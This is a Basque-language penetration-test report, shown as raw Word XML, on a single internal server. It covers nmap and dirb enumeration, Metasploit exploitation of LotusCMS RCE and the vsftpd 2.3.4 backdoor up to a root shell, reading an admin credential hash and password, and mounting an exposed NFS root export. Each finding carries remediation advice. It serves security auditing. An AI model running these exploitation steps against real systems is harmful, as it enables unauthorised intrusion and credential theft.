              <w:t>Kokapena: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Tokiko Sarea (Barne Auditoria)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Metodologia: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Kutxa Grisa (Gray Box) — soilik helburuko IPa eman zen aurretiaz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Esparrua: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Zerbitzari bakarra — 192.168.10.22</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="00E0233D">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:before="120" w:after="120" w:line="264" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B1660">
      <w:pPr>
        <w:keepNext/>
        <w:widowControl/>
        <w:spacing w:before="200" w:after="120" w:line="264" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Exekutatutako Faseak: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1. Informazio bilketa eta enumerazioa (Nmap, dirb)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2. Zerbitzuen identifikazioa eta bertsio analisia (-sV -sC)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3. Ahultasunen analisia (CVE bilaketa, konfigurazio azterketa)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4. Ustiapena — Web: LotusCMS RCE (Metasploit)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5. Ustiapena — FTP: vsftpd backdoor (Metasploit)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6. Ustiapena — NFS: fitxategi sistema montaketa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7. Pribilegio-eskalatzea — kasu honetan EZ ZEN BEHARREZKOA izan, FTP backdoor-ak zuzenean root maila eman baitzuen (ikus 4.2 atala)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8. Post-exploitation eta eb</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>identziak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9. Dokumentazioa eta txostena</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B1660">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
        <w:keepNext/>
        <w:widowControl/>
        <w:spacing w:before="360" w:after="120" w:line="264" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>3. ESKANEATZE FASEA ETA NMAP EMAITZAK</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B1660">
      <w:pPr>
        <w:pStyle w:val="Ttulo4"/>
        <w:keepNext/>
        <w:widowControl/>
        <w:spacing w:before="280" w:after="120" w:line="264" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>3.1 Nmap Eskaneatzea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Analisia hasteko, Nmap tresna erabili da sareko portu irekiak eta zerbitzuen bertsioak detektatzeko:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B1660">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:before="100" w:after="120" w:line="264" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Courier New" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>$ nmap -sV -sC -oN scan.txt 192.168.10.22</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B1660">
      <w:pPr>
        <w:pStyle w:val="Ttulo4"/>
        <w:keepNext/>
        <w:widowControl/>
        <w:spacing w:before="280" w:after="120" w:line="264" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>3.2 Aurkitutak</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>o Portuak eta Zerbitzuak</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableNormal"/>
        <w:tblW w:w="9240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10"/>
        <w:gridCol w:w="2416"/>
        <w:gridCol w:w="1778"/>
        <w:gridCol w:w="3836"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E0233D">
        <w:trPr>
          <w:cantSplit/>
          <w:tblHeader/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1224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Portua</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2448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Egoera</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1800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Zerbitzua</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3888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Bertsioa</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E0233D">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="122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21/tcp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="244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irekita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ftp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="388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vsftpd 2.3.4 (Anonymous login baimendua)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E0233D">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="12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22/tcp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irekita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ssh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OpenSSH 8.2p1 (Ubuntu)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E0233D">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="122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80/tcp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="244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irekita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http</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="388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Apache httpd 2.4.41 (Ubuntu)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E0233D">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="12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111/tcp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irekita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rpcbind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RPC #100000 (v2-4)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E0233D">
        <w:trPr>
          <w:cantSplit/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="122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2049/tcp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="244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irekita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nfs_acl</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="388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NFS v3 (RPC #100227)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B1660">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:before="120" w:after="120" w:line="264" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>FTP zerbitzuak Anonymous login onartzen du (FTP kode 230). NFS zerbitzuak rpcbind-ekin batera montaketa zerbitzuak eskaintzen ditu sarean.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B1660">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
        <w:keepNext/>
        <w:widowControl/>
        <w:spacing w:before="360" w:after="120" w:line="264" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>4. AURKITUTAKO AHULTASUNAK ETA PROBAK</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B1660">
      <w:pPr>
        <w:pStyle w:val="Ttulo4"/>
        <w:keepNext/>
        <w:widowControl/>
        <w:spacing w:before="280" w:after="120" w:line="264" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>4.1. HTTP Zerbitzua (80/TCP) — LotusCMS 3.0 — Urruneko Kode Exekuzioa</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableNormal"/>
        <w:tblW w:w="9240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57"/>
        <w:gridCol w:w="6183"/>
      </w:tblGrid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CVE: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CVE-2012-1623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Kategoria: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Urruneko Kode Exekuzioa (RCE)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Arrisku Maila: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Cs/>
                <w:color w:val="000000"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>KRITIKOA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CVSS Puntuazioa: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7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B1660">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:before="120" w:after="120" w:line="264" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Deskribapena: LotusCMS 3.0-ren index.php fitxategiko page parametroa PHP </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>eval(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>) funtzioaren bidez exekutatzen da, sarrera sanitizatu gabe. Honek edozein erasotzaileri urruneko PHP kodea exekutatzeko aukera ematen dio autentifikatu gabe.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B1660">
      <w:pPr>
        <w:keepNext/>
        <w:widowControl/>
        <w:spacing w:before="200" w:after="120" w:line="264" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Dirb bidezko enumerazioa:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B1660">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:before="100" w:after="120" w:line="264" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Courier New" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>$ dirb http://192.168.10.22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=&gt; /cms/ direktorioa aurkitu da</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B1660">
      <w:pPr>
        <w:keepNext/>
        <w:widowControl/>
        <w:spacing w:before="200" w:after="120" w:line="264" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Metasploit bidezko ustiapena:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B1660">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:before="100" w:after="120" w:line="264" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Courier New" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>msf6 &gt; use exploit/multi/http/lcms_php_exec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msf6 &gt; set RHOSTS 192.168.10.22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msf6 &gt; set LHOST 192.168.10.11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msf6 &gt; set URI /cms/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msf6 &gt; run</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B1660">
      <w:pPr>
        <w:keepNext/>
        <w:widowControl/>
        <w:spacing w:before="200" w:after="120" w:line="264" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>E</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>maitza:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B1660">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:before="100" w:after="120" w:line="264" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Courier New" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[*] Meterpreter session 1 opened (192.168.10.11:4444 -&gt; 192.168.10.22:36196)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Meterpreter sesio hau zerbitzariko web-erabiltzailearekin (www-data) exekutatzen da, EZ root mailarekin. Sesio horren bidez fitxategi-sistema arakatu eta admin kredentzial</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>en hash-a eskuratu da — root sarbiderik ez da lortu urrats honetan:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B1660">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:before="100" w:after="120" w:line="264" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Courier New" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>meterpreter &gt; cd /var/www/html/cms/data/users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meterpreter &gt; cat admin.dat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9cb3b0f16b861d3c9a198c30d5f873c344937d2c|administrator|admin@uni.eus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Ondoren, SHA1 hash hori identifikatu (ikus 4.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>4 atala) eta panel administratzailean sarbidea lortu da:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B1660">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:before="100" w:after="120" w:line="264" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>URL: http://192.168.10.22/cms/index.php?system=Admin</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Usuario: administrator   Pasahitza: Admin123</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B1660">
      <w:pPr>
        <w:keepNext/>
        <w:widowControl/>
        <w:spacing w:before="200" w:after="120" w:line="264" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Gomendazioa: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LotusCMS bertsio seguru batera eguneratu edo aplikazioa ordezkatu. Sarrera guztiak sanit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">izatu PHP </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>eval(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>) erabili aurretik. Web Application Firewall (WAF) ezarri.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B1660">
      <w:pPr>
        <w:pStyle w:val="Ttulo4"/>
        <w:keepNext/>
        <w:widowControl/>
        <w:spacing w:before="280" w:after="120" w:line="264" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>4.2. FTP Zerbitzua (21/TCP) — vsftpd 2.3.4 — Backdoor</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableNormal"/>
        <w:tblW w:w="9240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57"/>
        <w:gridCol w:w="6183"/>
      </w:tblGrid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CVE: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CVE-2011-2523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lastRenderedPageBreak/>
              <w:t>Kategoria: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Backdoor — Root Shell Zuzena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Arrisku Maila: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Cs/>
                <w:color w:val="000000"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>KRITIKOA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CVSS Puntuazioa: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10.0 (AV:N/AC:L/Au:N/C:C/I:C/A:C)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B1660">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:before="120" w:after="120" w:line="264" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Deskribapena: vsftpd 2.3.4 bertsioan backdoor bat sartu zuten iturri-kodean 2011an. Erabiltzaile-izenean ':)' karaktereak bidaltzen badira, zerbitzariak 6200 portuan root shell bat irekitzen du autentifikazio gabe.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B1660">
      <w:pPr>
        <w:keepNext/>
        <w:widowControl/>
        <w:spacing w:before="200" w:after="120" w:line="264" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Metasploit bidezko ustiapena:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B1660">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:before="100" w:after="120" w:line="264" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Courier New" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>msf6 &gt; use exploit/unix/ftp/vsftpd_234_backdoor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msf6 &gt; set RHOSTS 192.168.10.22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msf6 &gt; run</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B1660">
      <w:pPr>
        <w:keepNext/>
        <w:widowControl/>
        <w:spacing w:before="200" w:after="120" w:line="264" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Emaitza:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B1660">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:before="100" w:after="120" w:line="264" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Courier New" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[*] 192.168.10.22:21 - Banner: 220 (vsFTPd 2.3.4)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[+] 192.168.10.22:21 - Backdoor service has been spawned, handling...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[+] 19</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Courier New" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>2.168.10.22:21 - UID: uid=0(root) gid=0(root) groups=0(root)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[*] Command shell session 1 opened -&gt; port 6200</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B1660">
      <w:pPr>
        <w:keepNext/>
        <w:widowControl/>
        <w:spacing w:before="200" w:after="120" w:line="264" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Shell-eko egiaztapena:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B1660">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:before="100" w:after="120" w:line="264" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Courier New" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t># whoami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root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# id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uid=0(root) gid=0(root) groups=0(root)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Ahultasun honek, zuzenean eta inolako pribilegio-eskalatze urratsi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>k gabe, root mailako sarbide osoa eman du. Horregatik ez zen beharrezko izan ondorengo pribilegio-eskalatze faserik (ikus 2. atalean zerrendatutako 7. fasea).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B1660">
      <w:pPr>
        <w:keepNext/>
        <w:widowControl/>
        <w:spacing w:before="200" w:after="120" w:line="264" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Gomendazioa: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vsftpd 2.3.4 berehalakoan ordezkatu bertsio seguru batekin (3.0.5+). FTP zerbitzua beharrezkoa ez bada, guztiz desgaitu eta SFTP erabili. Firewall bidez FTP sarbidea mugatu IP baimendutako zerrenda batera.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B1660">
      <w:pPr>
        <w:pStyle w:val="Ttulo4"/>
        <w:keepNext/>
        <w:widowControl/>
        <w:spacing w:before="280" w:after="120" w:line="264" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>4.3. NFS Zerbitzua (111/TCP + 2049/TCP) — Konfigur</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>azio Okerra</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableNormal"/>
        <w:tblW w:w="9240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57"/>
        <w:gridCol w:w="6183"/>
      </w:tblGrid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CVE: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Ez (Konfigurazio Okerra)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Kategoria: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Fitxategi Sistemara Autentifikaziorik Gabeko Sarbidea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Arrisku Maila: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Cs/>
                <w:color w:val="000000"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>KRITIKOA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Baldintza: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root_squash gabe, IP murrizketarik gabe</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B1660">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:before="120" w:after="120" w:line="264" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Deskribapena: NFS zerbitzuak zerbitzariaren sistema fitxategi OSOA (/) sare guztiari (*) esportatzen dio, root_squash konfiguraziorik gabe. Proba honetan irakurketa-sarbide osoa egiaztatu da autentifikazio gabe; root_squash desaktibatuta egoteak idazketa-s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>arbide arriskua ere badakar, nahiz eta proba honetan idazketarik ez den egiaztatu.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B1660">
      <w:pPr>
        <w:keepNext/>
        <w:widowControl/>
        <w:spacing w:before="200" w:after="120" w:line="264" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>1. Esportazioen enumerazioa:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B1660">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:before="100" w:after="120" w:line="264" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Courier New" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>$ showmount -e 192.168.10.22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Export list for 192.168.10.22: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/       *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/home   *</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B1660">
      <w:pPr>
        <w:keepNext/>
        <w:widowControl/>
        <w:spacing w:before="200" w:after="120" w:line="264" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>2. Fitxategi sistema montatzea:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B1660">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:before="100" w:after="120" w:line="264" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Courier New" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>$ mkdir /tmp/nfs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$ sudo mount -t nfs 192.168.10.22:/ /tmp/nfs -o nolock</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E0233D" w:rsidRDefault="003B1660">
      <w:pPr>
        <w:keepNext/>
        <w:widowControl/>
        <w:spacing w:before="200" w:after="120" w:line="264" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
